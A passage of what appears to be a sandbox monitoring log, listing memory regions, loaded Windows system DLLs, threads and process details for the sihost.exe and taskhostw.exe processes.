= 0x7fffb17222e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3187 start_va = 0x500000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3188 start_va = 0x7fffa4760000 end_va = 0x7fffa489cfff monitored = 0 entry_point = 0x7fffa477a6a0 region_type = mapped_file name = "licensemanager.dll" filename = "\\Windows\\System32\\LicenseManager.dll" (normalized: "c:\\windows\\system32\\licensemanager.dll") Region: id = 3192 start_va = 0x7fffa4520000 end_va = 0x7fffa4535fff monitored = 0 entry_point = 0x7fffa452b550 region_type = mapped_file name = "clipc.dll" filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll") Region: id = 3197 start_va = 0x7fffa6aa0000 end_va = 0x7fffa6abcfff monitored = 0 entry_point = 0x7fffa6aa6190 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 3223 start_va = 0x720000 end_va = 0x721fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 3224 start_va = 0x7fffadd70000 end_va = 0x7fffadd87fff monitored = 0 entry_point = 0x7fffadd74a20 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 3239 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 3240 start_va = 0xf80000 end_va = 0xf91fff monitored = 0 entry_point = 0xfa7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3241 start_va = 0x7fffb1510000 end_va = 0x7fffb15a8fff monitored = 0 entry_point = 0x7fffb153f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 3242 start_va = 0x730000 end_va = 0x734fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 3324 start_va = 0x3700000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 3325 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Thread: id = 176 os_tid = 0x57c Thread: id = 177 os_tid = 0x578 Thread: id = 178 os_tid = 0x574 Thread: id = 179 os_tid = 0x570 Thread: id = 180 os_tid = 0x56c Thread: id = 181 os_tid = 0x550 Thread: id = 182 os_tid = 0x414 Thread: id = 183 os_tid = 0x20c Thread: id = 184 os_tid = 0x1b0 Thread: id = 185 os_tid = 0x1b4 Thread: id = 186 os_tid = 0x1c8 Thread: id = 187 os_tid = 0x168 Thread: id = 188 os_tid = 0x174 Thread: id = 189 os_tid = 0x3fc Thread: id = 190 os_tid = 0x3f4 Thread: id = 191 os_tid = 0x584 Thread: id = 192 os_tid = 0x588 Thread: id = 195 os_tid = 0x5b8 Thread: id = 201 os_tid = 0x5e4 Thread: id = 250 os_tid = 0x798 Thread: id = 263 os_tid = 0x7f4 Thread: id = 264 os_tid = 0x8 Thread: id = 273 os_tid = 0x790 Process: id = "12" image_name = "sihost.exe" filename = "c:\\windows\\system32\\sihost.exe" page_root = "0x530e6000" os_pid = "0x5cc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x358" cmd_line = "sihost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f256" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2600 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2601 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2602 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2603 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2604 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2605 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2606 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2607 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2608 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2609 start_va = 0x7ff7ca3b0000 end_va = 0x7ff7ca3c5fff monitored = 0 entry_point = 0x7ff7ca3b5190 region_type = mapped_file name = "sihost.exe" filename = "\\Windows\\System32\\sihost.exe" (normalized: "c:\\windows\\system32\\sihost.exe") Region: id = 2610 start_va = 0x7fffb5030000 end_va = 0x7fffb51f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2611 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2612 start_va = 0x4a0000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 2613 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2614 start_va = 0x7fffb1b20000 end_va = 0x7fffb1d07fff monitored = 0 entry_point = 0x7fffb1b4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2615 start_va = 0x7fffb3fa0000 end_va = 0x7fffb404cfff monitored = 0 entry_point = 0x7fffb3fb81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2616 start_va = 0xf0000 end_va = 0x1adfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2617 start_va = 0x7fffb3a90000 end_va = 0x7fffb3b2cfff monitored = 0 entry_point = 0x7fffb3a978a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2618 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2619 start_va = 0x7fffb4860000 end_va = 0x7fffb4adcfff monitored = 0 entry_point = 0x7fffb4934970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2620 start_va = 0x7fffb42d0000 end_va = 0x7fffb43ebfff monitored = 0 entry_point = 0x7fffb43102b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2621 start_va = 0x7fffb1ab0000 end_va = 0x7fffb1b19fff monitored = 0 entry_point = 0x7fffb1ae6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2622 start_va = 0x7fffb4050000 end_va = 0x7fffb40aafff monitored = 0 entry_point = 0x7fffb40638b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2623 start_va = 0x7fffb4f80000 end_va = 0x7fffb5026fff monitored = 0 entry_point = 0x7fffb4f958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2624 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2625 start_va = 0x7fffb0b40000 end_va = 0x7fffb0b70fff monitored = 0 entry_point = 0x7fffb0b47d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2626 start_va = 0x7fffaf630000 end_va = 0x7fffaf6edfff monitored = 0 entry_point = 0x7fffaf672d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 2627 start_va = 0x7fffa9640000 end_va = 0x7fffa98c7fff monitored = 0 entry_point = 0x7fffa969f670 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 2628 start_va = 0x5a0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 2629 start_va = 0x7fffb16d0000 end_va = 0x7fffb16defff monitored = 0 entry_point = 0x7fffb16d3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2630 start_va = 0x7fffb4700000 end_va = 0x7fffb4855fff monitored = 0 entry_point = 0x7fffb470a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2631 start_va = 0x7fffb3b40000 end_va = 0x7fffb3cc5fff monitored = 0 entry_point = 0x7fffb3b8ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2632 start_va = 0x7fffb16e0000 end_va = 0x7fffb1794fff monitored = 0 entry_point = 0x7fffb17222e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2633 start_va = 0x7fffac890000 end_va = 0x7fffac9c5fff monitored = 0 entry_point = 0x7fffac8bf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2634 start_va = 0x620000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 2635 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2636 start_va = 0x1c0000 end_va = 0x1f8fff monitored = 0 entry_point = 0x1c12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2637 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 2638 start_va = 0x7fffb3f60000 end_va = 0x7fffb3f9afff monitored = 0 entry_point = 0x7fffb3f612f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2639 start_va = 0x920000 end_va = 0xaa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 2640 start_va = 0xab0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 2641 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2642 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2643 start_va = 0x620000 end_va = 0x6fcfff monitored = 0 entry_point = 0x67e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2644 start_va = 0x780000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 2667 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2668 start_va = 0x7fffb3e50000 end_va = 0x7fffb3ef6fff monitored = 0 entry_point = 0x7fffb3e5b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2669 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2670 start_va = 0x7fffabb50000 end_va = 0x7fffabb6dfff monitored = 0 entry_point = 0x7fffabb55340 region_type = mapped_file name = "desktopshellext.dll" filename = "\\Windows\\System32\\DesktopShellExt.dll" (normalized: "c:\\windows\\system32\\desktopshellext.dll") Region: id = 2673 start_va = 0x7fffa92f0000 end_va = 0x7fffa9301fff monitored = 0 entry_point = 0x7fffa92f5110 region_type = mapped_file name = "windows.shell.servicehostbuilder.dll" filename = "\\Windows\\System32\\Windows.Shell.ServiceHostBuilder.dll" (normalized: "c:\\windows\\system32\\windows.shell.servicehostbuilder.dll") Region: id = 2675 start_va = 0x620000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 2676 start_va = 0x1eb0000 end_va = 0x1f8cfff monitored = 0 entry_point = 0x1f0e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2678 start_va = 0x1eb0000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 2679 start_va = 0x1f30000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 2680 start_va = 0x1fb0000 end_va = 0x202ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 2712 start_va = 0x7fffaed20000 end_va = 0x7fffaf1b2fff monitored = 0 entry_point = 0x7fffaed2f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2713 start_va = 0x7fffa9210000 end_va = 0x7fffa92e9fff monitored = 0 entry_point = 0x7fffa92603b0 region_type = mapped_file name = "modernexecserver.dll" filename = "\\Windows\\System32\\modernexecserver.dll" (normalized: "c:\\windows\\system32\\modernexecserver.dll") Region: id = 2715 start_va = 0x7fffb2460000 end_va = 0x7fffb2520fff monitored = 0 entry_point = 0x7fffb2480da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2716 start_va = 0x7fffb1670000 end_va = 0x7fffb16bafff monitored = 0 entry_point = 0x7fffb16735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2717 start_va = 0x7fffb03d0000 end_va = 0x7fffb03f9fff monitored = 0 entry_point = 0x7fffb03d8b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 2735 start_va = 0x7fffa91c0000 end_va = 0x7fffa920afff monitored = 0 entry_point = 0x7fffa91d7b70 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 2736 start_va = 0x7fffb0240000 end_va = 0x7fffb033ffff monitored = 0 entry_point = 0x7fffb0280f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 2737 start_va = 0x7fffb14e0000 end_va = 0x7fffb1508fff monitored = 0 entry_point = 0x7fffb14f4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2739 start_va = 0x7fffab7e0000 end_va = 0x7fffab871fff monitored = 0 entry_point = 0x7fffab82a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 2740 start_va = 0x2030000 end_va = 0x2172fff monitored = 0 entry_point = 0x2058210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2759 start_va = 0x480000 end_va = 0x481fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 2760 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 2761 start_va = 0x2030000 end_va = 0x210ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2768 start_va = 0x2110000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 2769 start_va = 0x7fffaffd0000 end_va = 0x7fffb0065fff monitored = 0 entry_point = 0x7fffafff5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2770 start_va = 0x2190000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 2772 start_va = 0x7fffa8fb0000 end_va = 0x7fffa8fe0fff monitored = 0 entry_point = 0x7fffa8fb3400 region_type = mapped_file name = "clipboardserver.dll" filename = "\\Windows\\System32\\ClipboardServer.dll" (normalized: "c:\\windows\\system32\\clipboardserver.dll") Region: id = 2773 start_va = 0x7fffa8f50000 end_va = 0x7fffa8facfff monitored = 0 entry_point = 0x7fffa8f60080 region_type = mapped_file name = "activationmanager.dll" filename = "\\Windows\\System32\\ActivationManager.dll" (normalized: "c:\\windows\\system32\\activationmanager.dll") Region: id = 2774 start_va = 0x7fffa8f20000 end_va = 0x7fffa8f42fff monitored = 0 entry_point = 0x7fffa8f23020 region_type = mapped_file name = "appointmentactivation.dll" filename = "\\Windows\\System32\\AppointmentActivation.dll" (normalized: "c:\\windows\\system32\\appointmentactivation.dll") Region: id = 2776 start_va = 0x2190000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 2777 start_va = 0x22f0000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 2778 start_va = 0x7fffb45b0000 end_va = 0x7fffb46f2fff monitored = 0 entry_point = 0x7fffb45d8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2779 start_va = 0x7fffab340000 end_va = 0x7fffab380fff monitored = 0 entry_point = 0x7fffab344840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 2780 start_va = 0x2210000 end_va = 0x228ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 2781 start_va = 0x7fffabc10000 end_va = 0x7fffabc1ffff monitored = 0 entry_point = 0x7fffabc12c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 2782 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 2783 start_va = 0x2400000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 2784 start_va = 0x2c00000 end_va = 0x2c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 2785 start_va = 0x2c80000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c80000" filename = "" Region: id = 2786 start_va = 0x2d00000 end_va = 0x2d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 2787 start_va = 0x2d80000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 2836 start_va = 0x7fffa8ed0000 end_va = 0x7fffa8f13fff monitored = 0 entry_point = 0x7fffa8edc010 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 2839 start_va = 0x7fffa8e80000 end_va = 0x7fffa8e8dfff monitored = 0 entry_point = 0x7fffa8e82690 region_type = mapped_file name = "notificationplatformcomponent.dll" filename = "\\Windows\\System32\\notificationplatformcomponent.dll" (normalized: "c:\\windows\\system32\\notificationplatformcomponent.dll") Region: id = 2841 start_va = 0x7fffa8da0000 end_va = 0x7fffa8e36fff monitored = 0 entry_point = 0x7fffa8db4fd0 region_type = mapped_file name = "appcontracts.dll" filename = "\\Windows\\System32\\AppContracts.dll" (normalized: "c:\\windows\\system32\\appcontracts.dll") Region: id = 2842 start_va = 0x7fffa8cf0000 end_va = 0x7fffa8d91fff monitored = 0 entry_point = 0x7fffa8cf2b20 region_type = mapped_file name = "sharehost.dll" filename = "\\Windows\\System32\\ShareHost.dll" (normalized: "c:\\windows\\system32\\sharehost.dll") Region: id = 2843 start_va = 0x7fffb4f20000 end_va = 0x7fffb4f71fff monitored = 0 entry_point = 0x7fffb4f2f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2844 start_va = 0x7fffb1d10000 end_va = 0x7fffb2353fff monitored = 0 entry_point = 0x7fffb1ed64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2845 start_va = 0x7fffb2380000 end_va = 0x7fffb23c2fff monitored = 0 entry_point = 0x7fffb2394b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2846 start_va = 0x7fffb1650000 end_va = 0x7fffb1663fff monitored = 0 entry_point = 0x7fffb16552e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2847 start_va = 0x7fffa8ce0000 end_va = 0x7fffa8ce8fff monitored = 0 entry_point = 0x7fffa8ce1480 region_type = mapped_file name = "wpportinglibrary.dll" filename = "\\Windows\\System32\\WpPortingLibrary.dll" (normalized: "c:\\windows\\system32\\wpportinglibrary.dll") Region: id = 2849 start_va = 0x2e00000 end_va = 0x2e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 2850 start_va = 0x7fffa8a80000 end_va = 0x7fffa8cdcfff monitored = 0 entry_point = 0x7fffa8b08610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 2856 start_va = 0x7fffa8a60000 end_va = 0x7fffa8a74fff monitored = 0 entry_point = 0x7fffa8a61ab0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 2862 start_va = 0x2e80000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e80000" filename = "" Region: id = 2864 start_va = 0x2f00000 end_va = 0x2f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 2866 start_va = 0x7fffb0fd0000 end_va = 0x7fffb0fe6fff monitored = 0 entry_point = 0x7fffb0fd79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2867 start_va = 0x7fffb0c60000 end_va = 0x7fffb0c93fff monitored = 0 entry_point = 0x7fffb0c7ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2868 start_va = 0x2f80000 end_va = 0x32b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2869 start_va = 0x7fffb10f0000 end_va = 0x7fffb10fafff monitored = 0 entry_point = 0x7fffb10f19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2871 start_va = 0x7fffa81e0000 end_va = 0x7fffa81f0fff monitored = 0 entry_point = 0x7fffa81e5e90 region_type = mapped_file name = "licensemanagerapi.dll" filename = "\\Windows\\System32\\LicenseManagerApi.dll" (normalized: "c:\\windows\\system32\\licensemanagerapi.dll") Thread: id = 196 os_tid = 0x5d0 Thread: id = 197 os_tid = 0x5dc Thread: id = 198 os_tid = 0x5e0 Thread: id = 204 os_tid = 0x5f8 Thread: id = 205 os_tid = 0x5fc Thread: id = 206 os_tid = 0x600 Thread: id = 213 os_tid = 0x624 Thread: id = 216 os_tid = 0x638 Thread: id = 217 os_tid = 0x644 Thread: id = 218 os_tid = 0x648 Thread: id = 219 os_tid = 0x64c Thread: id = 226 os_tid = 0x65c Thread: id = 227 os_tid = 0x664 Thread: id = 228 os_tid = 0x670 Thread: id = 229 os_tid = 0x690 Thread: id = 230 os_tid = 0x6c4 Process: id = "13" image_name = "taskhostw.exe" filename = "c:\\windows\\system32\\taskhostw.exe" page_root = "0x6beed000" os_pid = "0x604" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x358" cmd_line = "taskhostw.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f256" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2681 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2682 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2683 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2684 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 